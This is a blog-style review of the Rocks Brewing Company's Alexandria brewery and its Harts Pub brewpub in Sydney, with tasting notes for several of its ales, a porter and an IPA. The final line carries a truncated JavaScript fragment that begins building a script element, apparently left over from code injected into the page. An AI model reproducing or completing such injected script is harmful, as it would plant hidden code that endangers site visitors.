The Rocks Brewing Company has recently (February 2014) moved to its very up-to-date brewing facility in Bourke Rd, Alexandria. As well as the microbrewery, there is a large courtyard with tons of seating served by a restaurant offering breakfast, lunch and dinner as well as all the mainstay Rocks Brewing beers.
What is so impressive about this brewery is that it has its main base here and a superb brewpub in the form of the “Harts Pub”, in the Rocks area of Sydney. But first, the brewery at Alexandria – you can try the whole range of beers in a tasting paddle, then order your favourite. There is also a superb menu at the Brewery Bar to complement your beer, catering for breakfast, lunch and dinner. The Brewery Bar is open from 7.30 am to 10 pm., (10 am to 10pm for licensed drinks). Lunch on the day that I was there included slow-cooked Lamb Shanks and a Lentil and Spinach soup, as well as many other tempting mains and desserts.
The Rocks Brewing Company produces five mainstay flavour-packed beers, with names derived from Sydney’s early colonial days – “Hangman” Pale Ale, “Governor” Golden Ale and so on.
The “Hangman” Pale Ale is golden-amber and has aromas of citrus and new hay. The taste is deep and plentiful – notes of apricots and orange zest, and with 4.9% ABV, this is a flavoursome beer.
The “Governor” Golden Ale has a light yellow colour, is very aromatic and with a taste that includes peach, mango, honey and a hint of pine resin. This is 4.5% ABV.
The “Hangman” and “Governor” are available in bottles, and now the “Conviction” IPA (2015).
Now let’s go back to the site of the original brewery, the “Harts Pub” in the Rocks area of Sydney. This used to be three terrace houses, and is now combined into one building. The “Harts Pub” has comfortable little rooms with sofas and hidden fireplaces. It’s like going into a pub full of smaller pubs. Apparently it also used to be the home of Aussie icon chef, Margaret Fulton. How good is that?
Here I sampled the “Butcher” Porter which is a deep chestnut colour with a toasty, biscuit aroma and roasted malt flavour, enhanced with a refreshing tang of sourness. This is very refreshing, and has 5% ABV.
The “Boxer” is a Red Ale, with an excellent balance of malt and hops with a long bitter finish. This has 4.2% ABV.
Rocks Brewing also produces seasonal brews such as India Pale Ales like the “Conviction” IPA. This has 7.0% ABV, and unfermentable sugars to sweeten it plus three different types of hop. This has a unique flavour, delicious and bitter with fruit, pepper and amazing hints of pine resin and grapefruit as well. Now available in bottles.
A final footnote – another pub, the “Lord Raglan” also in Alexandria, is set to become the third Rocks Brewing Company brewpub in the near future.var d=document;var s=d.createElement(‘script’);
